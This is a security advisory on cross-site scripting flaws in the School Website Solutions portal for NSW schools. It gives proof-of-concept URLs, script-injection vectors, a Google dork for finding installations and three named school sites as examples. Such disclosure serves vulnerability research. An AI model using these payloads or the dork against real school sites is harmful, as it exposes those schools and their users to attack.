School Website Solutions Cross Site Scripting

2012.04.24
Credit: Phizo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:schools.nsw.edu.au/sws/

=============================================================== = # Exploit Title: SWS - Cross Site Scripting vulnerabilities = = # Date: 23/04/2012 = = # Author: Phizo = = # Manufacturer: www.schoolwebsitesolutions.com = = # Version: Latest (Private software, no version number) = = # Category: webapps = = # Google dork: inurl:schools.nsw.edu.au/sws/ = = # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0) = =============================================================== [+] Information: SWS is a private portal software created for NSW schools only, hence why I could not gather details such as the version of the software. Multiple XSS vulnerabilities will be shown to show the insecurity of the portal software. [+] Details: ======== Search -- (Value contained within script tags) ======== # PoC: http://victim/search?search=[XSS] # Vulnerable code: a.execute("VALUE"); -- VALUE is the value of user input. # Vector used: '); alert("XSS"); (' # Output: a.execute("");alert("XSS");(""); ========== Calendar ========== # PoC: http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS] # Vulnerable code: (multiple hyperlinks, however I will provide one). <a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012&print=true" target="_blank" class="printmonth">Print this page</a> # Vector used: "><script>alert("XSS")</script> # Output: <a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012"><script>alert("XSS")</script>&print=true" target="_blank" class="printmonth">Print this page</a> [+] Example sites: http://www.cook-s.schools.nsw.edu.au/ http://www.lawrenceha-s.schools.nsw.edu.au/ http://www.parameadow-s.schools.nsw.edu.au/

References:

http://www.schoolwebsitesolutions.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top